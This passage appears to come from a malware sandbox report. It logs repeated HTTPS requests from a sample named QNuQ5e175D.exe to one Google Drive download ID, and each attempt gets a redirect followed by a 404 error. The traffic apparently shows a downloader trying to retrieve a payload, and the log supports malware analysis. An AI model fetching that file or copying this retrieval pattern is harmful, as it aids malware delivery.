                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:04 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-mss5tc9l6Scz7YgPy5zOEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      57192.168.2.1150037142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:05 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:05 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQ2nk-A7of0RxG9ZcrYhDVmQPlq5XwPjucQIcNmHQk9c6ZXVr-1z2N7BJdrgnrZFgLqiQe-0ww
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:05 GMT
                                                      Content-Security-Policy: script-src 'nonce-l-8onPjgFeRex80tzj8cYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:05 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 5f 76 30 36 57 49 6d 75 41 62 6a 70 47 6b 33 69 6d 50 4a 64 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="w_v06WImuAbjpGk3imPJdA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      58192.168.2.1150038172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:06 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:07 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:06 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-3_WqSIdSnW6Nt6VW4MpnKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      59192.168.2.1150039142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:07 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:08 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC6F1Gqhs39DhXemrL3IGwOBftFnWz0tQcSoD41wiFrlttNK0A2QGt_26RY0rNKsMZmz
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:08 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-Y5FI-lUMHjDm76mBcQGAJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 77 76 46 55 70 75 7a 78 37 6e 69 38 4c 52 34 38 63 34 2d 6a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZwvFUpuzx7ni8LR48c4-jA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      60192.168.2.1150040172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:08 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:09 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:09 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-wxPkvX2YDFoTTiaSi_SqEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      61192.168.2.1150041142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:10 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:10 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC55pC5XUPdIHCvhIPJJ0lwtQSua15A-UjuFCv8GWn6kk3Kk06RykxMbtXxSmnNT5LYW
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:10 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: script-src 'nonce-XxdxbcX2v9B9FMfbYiw6pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:10 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 47 52 68 65 38 67 48 70 72 42 4f 34 79 47 61 31 54 57 5f 2d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jGRhe8gHprBO4yGa1TW_-A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      62192.168.2.1150042172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:11 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:11 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:11 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: script-src 'nonce-gpsJDL8Gv1i6aTO-vKPcNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      63192.168.2.1150043142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:12 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:12 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC624ajSIfGzut2cDFCCMVIQXkSYMdtQbco-CWxL5CAuDJpnCF-qnbwNFiOL3Dpo89pY
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:12 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-50XjqCsO5A_HWlElcgQjKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
